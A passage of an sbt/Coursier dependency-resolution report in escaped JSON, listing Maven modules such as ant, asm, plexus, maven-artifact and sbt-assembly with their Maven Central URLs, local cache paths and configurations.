crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-artifact\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-artifact\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.inject\",\"name\":\"javax.inject\",\"revision\":\"1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"javax.inject\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://code.google.com/p/atinject/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.annotation\",\"name\":\"jsr250-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsr250-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://jcp.org/aboutJava/communityprocess/final/jsr250/index.html\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-analysis\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-analysis\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.enterprise\",\"name\":\"cdi-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"cdi-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-model\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-model\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-commons\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-commons\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant-launcher\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant-launcher\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-tree\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-tree\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.inject\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.inject\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.plexus\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.plexus\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.pantsbuild\",\"name\":\"jarjar\",\"revision\":\"1.7.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jarjar\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/pantsbuild/jarjar\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-component-annotations\",\"revision\":\"1.5.5\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-component-annotations\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-classworlds\",\"revision\":\"2.5.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-classworlds\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scalactic\",\"name\":\"scalactic_2.12\",\"revision\":\"3.0.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalactic_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scalatest.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-utils\",\"revision\":\"3.0.22\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-utils\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://plexus.codehaus.org/plexus-utils\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sbt-assembly\",\"revision\":\"0.14.10\",\"configurations\":\"compile\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt-assembly\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\"]],\"missingArtifacts\":[],\"publicationDate\":\"2019-08-06T10:52:23+08:00\",\"evicted\":false,\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"configurations\":[{\"name\":\"pom\"},{\"name\":\"test\"},{\"name\":\"provided\"},{\"name\":\"docs\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"sources\"},{\"name\":\"runtime\"}],\"licenses\":[[\"MIT License\",\"https://github.com/sbt/sbt-assembly/blob/master/LICENSE\"]],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"runtime-internal\"},\"modules\":[{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-plugin-api\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-plugin-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-artifact\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-artifact\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organiza